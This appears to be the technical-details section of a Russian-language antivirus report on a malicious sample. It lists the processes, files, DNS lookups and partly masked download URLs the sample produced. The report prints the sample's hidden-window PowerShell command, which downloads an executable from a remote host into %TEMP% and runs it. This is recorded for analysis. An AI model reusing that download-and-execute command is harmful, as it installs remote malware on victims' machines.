Техническая информация
- $sozjmjk как %temp%\vjkosonh-elt.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function gsdja([String] $sozjmjk){(New-Object System.Net.WebClient).DownloadFile($sozjmjk,''%TEMP%\vjkosonh-elt.exe'');Start-Process ''%TEMP%\vjkosonh-elt.exe'';}tr...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1400
- %TEMP%\nu-mjx.bat
- %TEMP%\904665.cvr
- 'sw######mmars.vonmammen.org':80
- http://sw######mmars.vonmammen.org/collada/farastorer.png
- DNS ASK we###opnumij.nl
- DNS ASK sw######mmars.vonmammen.org
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function gsdja([String] $sozjmjk){(New-Object System.Net.WebClient).DownloadFile($sozjmjk,''%TEMP%\vjkosonh-elt.exe'');Start-Process ''%TEMP%\vjkosonh-elt.exe'';}tr...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Nu-mjx.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Nu-mjx.bat" "